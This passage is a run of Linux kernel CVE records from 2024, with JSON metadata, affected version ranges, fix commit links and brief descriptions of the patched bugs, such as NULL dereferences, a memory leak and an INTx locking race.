                  "versionEndExcluding": "5.4.279",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.96",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.36",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.7",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nMIPS: Octeon: Add PCIe link status check\n\nThe standard PCIe configuration read-write interface is used to\naccess the configuration space of the peripheral PCIe devices\nof the mips processor after the PCIe link surprise down, it can\ngenerate kernel panic caused by \"Data bus error\". So it is\nnecessary to add PCIe link status check for system protection.\nWhen the PCIe link is down or in training, assigning a value\nof 0 to the configuration address can prevent read-write behavior\nto the configuration space of peripheral PCIe devices, thereby\npreventing kernel panic."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:36:58.353Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/6bff05aaa32c2f7e1f6e68e890876642159db419"
        },
        {
          "url": "https://git.kernel.org/stable/c/64845ac64819683ad5e51b668b2ed56ee3386aee"
        },
        {
          "url": "https://git.kernel.org/stable/c/6c1b9fe148a4e03bbfa234267ebb89f35285814a"
        },
        {
          "url": "https://git.kernel.org/stable/c/25998f5613159fe35920dbd484fcac7ea3ad0799"
        },
        {
          "url": "https://git.kernel.org/stable/c/d996deb80398a90dd3c03590e68dad543da87d62"
        },
        {
          "url": "https://git.kernel.org/stable/c/1c33fd17383f48f679186c54df78542106deeaa0"
        },
        {
          "url": "https://git.kernel.org/stable/c/38d647d509543e9434b3cc470b914348be271fe9"
        },
        {
          "url": "https://git.kernel.org/stable/c/29b83a64df3b42c88c0338696feb6fdcd7f1f3b7"
        }
      ],
      "title": "MIPS: Octeon: Add PCIe link status check",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-40968",
    "datePublished": "2024-07-12T12:32:07.476Z",
    "dateReserved": "2024-07-12T12:17:45.602Z",
    "dateUpdated": "2026-01-05T10:36:58.353Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-38625 (GCVE-0-2024-38625)

Vulnerability from cvelistv5 – Published: 2024-06-21 10:18 – Updated: 2025-05-04 09:15

Title

fs/ntfs3: Check 'folio' pointer for NULL

Summary

In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Check 'folio' pointer for NULL It can be NULL if bmap is called.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/6c8054d590668629b…
	https://git.kernel.org/stable/c/ff1068929459347f9…
	https://git.kernel.org/stable/c/1cd6c96219c429ebc…

Impacted products

Vendor

Product

Version

Linux

Affected: 82cae269cfa953032fbb8980a7d554d60fb00b17 , < 6c8054d590668629bb2eb6fb4cbf22455d08ada8 (git)
Affected: 82cae269cfa953032fbb8980a7d554d60fb00b17 , < ff1068929459347f9e47f8d14c409dcf938c2641 (git)
Affected: 82cae269cfa953032fbb8980a7d554d60fb00b17 , < 1cd6c96219c429ebcfa8e79a865277376c563803 (git)

Linux

Affected: 5.15
Unaffected: 0 , < 5.15 (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.9.4 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:12:26.044Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6c8054d590668629bb2eb6fb4cbf22455d08ada8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ff1068929459347f9e47f8d14c409dcf938c2641"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1cd6c96219c429ebcfa8e79a865277376c563803"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-38625",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:09:12.508694Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:44.808Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/ntfs3/inode.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6c8054d590668629bb2eb6fb4cbf22455d08ada8",
              "status": "affected",
              "version": "82cae269cfa953032fbb8980a7d554d60fb00b17",
              "versionType": "git"
            },
            {
              "lessThan": "ff1068929459347f9e47f8d14c409dcf938c2641",
              "status": "affected",
              "version": "82cae269cfa953032fbb8980a7d554d60fb00b17",
              "versionType": "git"
            },
            {
              "lessThan": "1cd6c96219c429ebcfa8e79a865277376c563803",
              "status": "affected",
              "version": "82cae269cfa953032fbb8980a7d554d60fb00b17",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/ntfs3/inode.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.15"
            },
            {
              "lessThan": "5.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.4",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.4",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/ntfs3: Check \u0027folio\u0027 pointer for NULL\n\nIt can be NULL if bmap is called."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:15:35.053Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/6c8054d590668629bb2eb6fb4cbf22455d08ada8"
        },
        {
          "url": "https://git.kernel.org/stable/c/ff1068929459347f9e47f8d14c409dcf938c2641"
        },
        {
          "url": "https://git.kernel.org/stable/c/1cd6c96219c429ebcfa8e79a865277376c563803"
        }
      ],
      "title": "fs/ntfs3: Check \u0027folio\u0027 pointer for NULL",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-38625",
    "datePublished": "2024-06-21T10:18:17.603Z",
    "dateReserved": "2024-06-18T19:36:34.945Z",
    "dateUpdated": "2025-05-04T09:15:35.053Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-39473 (GCVE-0-2024-39473)

Vulnerability from cvelistv5 – Published: 2024-07-05 06:55 – Updated: 2025-05-04 09:16

Title

ASoC: SOF: ipc4-topology: Fix input format query of process modules without base extension

Summary

In the Linux kernel, the following vulnerability has been resolved: ASoC: SOF: ipc4-topology: Fix input format query of process modules without base extension If a process module does not have base config extension then the same format applies to all of it's inputs and the process->base_config_ext is NULL, causing NULL dereference when specifically crafted topology and sequences used.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/e3ae00ee238bce6cf…
	https://git.kernel.org/stable/c/9e16f17a2a0e97b43…
	https://git.kernel.org/stable/c/ffa077b2f6ad124ec…

Impacted products

Vendor

Product

Version

Linux

Affected: 648fea12847695d60ddeebea86597114885ee76e , < e3ae00ee238bce6cfa5ad935c921181c14d18fd6 (git)
Affected: 648fea12847695d60ddeebea86597114885ee76e , < 9e16f17a2a0e97b43538b272e7071537a3e03368 (git)
Affected: 648fea12847695d60ddeebea86597114885ee76e , < ffa077b2f6ad124ec3d23fbddc5e4b0ff2647af8 (git)

Linux

Affected: 6.4
Unaffected: 0 , < 6.4 (semver)
Unaffected: 6.6.34 , ≤ 6.6.* (semver)
Unaffected: 6.9.5 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-39473",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-07-05T20:08:14.080925Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-07-05T20:08:25.422Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:26:14.967Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e3ae00ee238bce6cfa5ad935c921181c14d18fd6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9e16f17a2a0e97b43538b272e7071537a3e03368"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ffa077b2f6ad124ec3d23fbddc5e4b0ff2647af8"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "sound/soc/sof/ipc4-topology.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "e3ae00ee238bce6cfa5ad935c921181c14d18fd6",
              "status": "affected",
              "version": "648fea12847695d60ddeebea86597114885ee76e",
              "versionType": "git"
            },
            {
              "lessThan": "9e16f17a2a0e97b43538b272e7071537a3e03368",
              "status": "affected",
              "version": "648fea12847695d60ddeebea86597114885ee76e",
              "versionType": "git"
            },
            {
              "lessThan": "ffa077b2f6ad124ec3d23fbddc5e4b0ff2647af8",
              "status": "affected",
              "version": "648fea12847695d60ddeebea86597114885ee76e",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "sound/soc/sof/ipc4-topology.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.4"
            },
            {
              "lessThan": "6.4",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.34",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.34",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.5",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: SOF: ipc4-topology: Fix input format query of process modules without base extension\n\nIf a process module does not have base config extension then the same\nformat applies to all of it\u0027s inputs and the process-\u003ebase_config_ext is\nNULL, causing NULL dereference when specifically crafted topology and\nsequences used."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:16:33.235Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/e3ae00ee238bce6cfa5ad935c921181c14d18fd6"
        },
        {
          "url": "https://git.kernel.org/stable/c/9e16f17a2a0e97b43538b272e7071537a3e03368"
        },
        {
          "url": "https://git.kernel.org/stable/c/ffa077b2f6ad124ec3d23fbddc5e4b0ff2647af8"
        }
      ],
      "title": "ASoC: SOF: ipc4-topology: Fix input format query of process modules without base extension",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-39473",
    "datePublished": "2024-07-05T06:55:04.363Z",
    "dateReserved": "2024-06-25T14:23:23.745Z",
    "dateUpdated": "2025-05-04T09:16:33.235Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-40932 (GCVE-0-2024-40932)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:25 – Updated: 2026-01-05 10:36

Title

drm/exynos/vidi: fix memory leak in .get_modes()

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/exynos/vidi: fix memory leak in .get_modes() The duplicated EDID is never freed. Fix it.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/540ca99729e28dbe9…
	https://git.kernel.org/stable/c/ebcf81504fef03f70…
	https://git.kernel.org/stable/c/0acc356da8546b5c5…
	https://git.kernel.org/stable/c/777838c9b571674ef…
	https://git.kernel.org/stable/c/dcba6bedb43958114…
	https://git.kernel.org/stable/c/a269c5701244db272…
	https://git.kernel.org/stable/c/cb3ac233434dba130…
	https://git.kernel.org/stable/c/38e3825631b1f314b…

Impacted products

Vendor

Product

Version

Linux

Affected: ce6cb556c9fc95d69c661f8da0e3e410a4e6565a , < 540ca99729e28dbe902b01039a3b4bd74520a819 (git)
Affected: ce6cb556c9fc95d69c661f8da0e3e410a4e6565a , < ebcf81504fef03f701b9711e43fea4fe2d82ebc8 (git)
Affected: ce6cb556c9fc95d69c661f8da0e3e410a4e6565a , < 0acc356da8546b5c55aabfc2e2c5caa0ac9b0003 (git)
Affected: ce6cb556c9fc95d69c661f8da0e3e410a4e6565a , < 777838c9b571674ef14dbddf671f372265879226 (git)
Affected: ce6cb556c9fc95d69c661f8da0e3e410a4e6565a , < dcba6bedb439581145d8aa6b0925209f23184ae1 (git)
Affected: ce6cb556c9fc95d69c661f8da0e3e410a4e6565a , < a269c5701244db2722ae0fce5d1854f5d8f31224 (git)
Affected: ce6cb556c9fc95d69c661f8da0e3e410a4e6565a , < cb3ac233434dba130281db330c4b15665b2d2c4d (git)
Affected: ce6cb556c9fc95d69c661f8da0e3e410a4e6565a , < 38e3825631b1f314b21e3ade00b5a4d737eb054e (git)

Linux

Affected: 3.15
Unaffected: 0 , < 3.15 (semver)
Unaffected: 4.19.317 , ≤ 4.19.* (semver)
Unaffected: 5.4.279 , ≤ 5.4.* (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.95 , ≤ 6.1.* (semver)
Unaffected: 6.6.35 , ≤ 6.6.* (semver)
Unaffected: 6.9.6 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:57:59.558Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/540ca99729e28dbe902b01039a3b4bd74520a819"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ebcf81504fef03f701b9711e43fea4fe2d82ebc8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0acc356da8546b5c55aabfc2e2c5caa0ac9b0003"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/777838c9b571674ef14dbddf671f372265879226"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dcba6bedb439581145d8aa6b0925209f23184ae1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a269c5701244db2722ae0fce5d1854f5d8f31224"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cb3ac233434dba130281db330c4b15665b2d2c4d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/38e3825631b1f314b21e3ade00b5a4d737eb054e"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-40932",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:04:55.807236Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:27.263Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/exynos/exynos_drm_vidi.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "540ca99729e28dbe902b01039a3b4bd74520a819",
              "status": "affected",
              "version": "ce6cb556c9fc95d69c661f8da0e3e410a4e6565a",
              "versionType": "git"
            },
            {
              "lessThan": "ebcf81504fef03f701b9711e43fea4fe2d82ebc8",
              "status": "affected",
              "version": "ce6cb556c9fc95d69c661f8da0e3e410a4e6565a",
              "versionType": "git"
            },
            {
              "lessThan": "0acc356da8546b5c55aabfc2e2c5caa0ac9b0003",
              "status": "affected",
              "version": "ce6cb556c9fc95d69c661f8da0e3e410a4e6565a",
              "versionType": "git"
            },
            {
              "lessThan": "777838c9b571674ef14dbddf671f372265879226",
              "status": "affected",
              "version": "ce6cb556c9fc95d69c661f8da0e3e410a4e6565a",
              "versionType": "git"
            },
            {
              "lessThan": "dcba6bedb439581145d8aa6b0925209f23184ae1",
              "status": "affected",
              "version": "ce6cb556c9fc95d69c661f8da0e3e410a4e6565a",
              "versionType": "git"
            },
            {
              "lessThan": "a269c5701244db2722ae0fce5d1854f5d8f31224",
              "status": "affected",
              "version": "ce6cb556c9fc95d69c661f8da0e3e410a4e6565a",
              "versionType": "git"
            },
            {
              "lessThan": "cb3ac233434dba130281db330c4b15665b2d2c4d",
              "status": "affected",
              "version": "ce6cb556c9fc95d69c661f8da0e3e410a4e6565a",
              "versionType": "git"
            },
            {
              "lessThan": "38e3825631b1f314b21e3ade00b5a4d737eb054e",
              "status": "affected",
              "version": "ce6cb556c9fc95d69c661f8da0e3e410a4e6565a",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/exynos/exynos_drm_vidi.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.15"
            },
            {
              "lessThan": "3.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.317",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.279",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.95",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.35",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.317",
                  "versionStartIncluding": "3.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.279",
                  "versionStartIncluding": "3.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "3.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "3.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.95",
                  "versionStartIncluding": "3.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.35",
                  "versionStartIncluding": "3.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.6",
                  "versionStartIncluding": "3.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "3.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/exynos/vidi: fix memory leak in .get_modes()\n\nThe duplicated EDID is never freed. Fix it."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:36:52.097Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/540ca99729e28dbe902b01039a3b4bd74520a819"
        },
        {
          "url": "https://git.kernel.org/stable/c/ebcf81504fef03f701b9711e43fea4fe2d82ebc8"
        },
        {
          "url": "https://git.kernel.org/stable/c/0acc356da8546b5c55aabfc2e2c5caa0ac9b0003"
        },
        {
          "url": "https://git.kernel.org/stable/c/777838c9b571674ef14dbddf671f372265879226"
        },
        {
          "url": "https://git.kernel.org/stable/c/dcba6bedb439581145d8aa6b0925209f23184ae1"
        },
        {
          "url": "https://git.kernel.org/stable/c/a269c5701244db2722ae0fce5d1854f5d8f31224"
        },
        {
          "url": "https://git.kernel.org/stable/c/cb3ac233434dba130281db330c4b15665b2d2c4d"
        },
        {
          "url": "https://git.kernel.org/stable/c/38e3825631b1f314b21e3ade00b5a4d737eb054e"
        }
      ],
      "title": "drm/exynos/vidi: fix memory leak in .get_modes()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-40932",
    "datePublished": "2024-07-12T12:25:10.444Z",
    "dateReserved": "2024-07-12T12:17:45.583Z",
    "dateUpdated": "2026-01-05T10:36:52.097Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26810 (GCVE-0-2024-26810)

Vulnerability from cvelistv5 – Published: 2024-04-05 08:24 – Updated: 2025-05-04 08:57

Title

vfio/pci: Lock external INTx masking ops

Summary

In the Linux kernel, the following vulnerability has been resolved: vfio/pci: Lock external INTx masking ops Mask operations through config space changes to DisINTx may race INTx configuration changes via ioctl. Create wrappers that add locking for paths outside of the core interrupt code. In particular, irq_type is updated holding igate, therefore testing is_intx() requires holding igate. For example clearing DisINTx from config space can otherwise race changes of the interrupt configuration. This aligns interfaces which may trigger the INTx eventfd into two camps, one side serialized by igate and the other only enabled while INTx is configured. A subsequent patch introduces synchronization for the latter flows.

Severity ?

4.4 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/1e71b6449d5517917…
	https://git.kernel.org/stable/c/3dd9be6cb55e0f475…
	https://git.kernel.org/stable/c/ec73e079729258a05…
	https://git.kernel.org/stable/c/3fe0ac10bd117df84…
	https://git.kernel.org/stable/c/04a4a017b9ffd7b0f…
	https://git.kernel.org/stable/c/6fe478d855b20ac1e…
	https://git.kernel.org/stable/c/03505e3344b0576fd…
	https://git.kernel.org/stable/c/810cd4bb53456d050…

Impacted products

Vendor

Product

Version

Linux

Affected: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 , < 1e71b6449d55179170efc8dee8664510bb813b42 (git)
Affected: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 , < 3dd9be6cb55e0f47544e7cdda486413f7134e3b3 (git)
Affected: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 , < ec73e079729258a05452356cf6d098bf1504d5a6 (git)
Affected: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 , < 3fe0ac10bd117df847c93408a9d428a453cd60e5 (git)
Affected: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 , < 04a4a017b9ffd7b0f427b8c376688d14cb614651 (git)
Affected: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 , < 6fe478d855b20ac1eb5da724afe16af5a2aaaa40 (git)
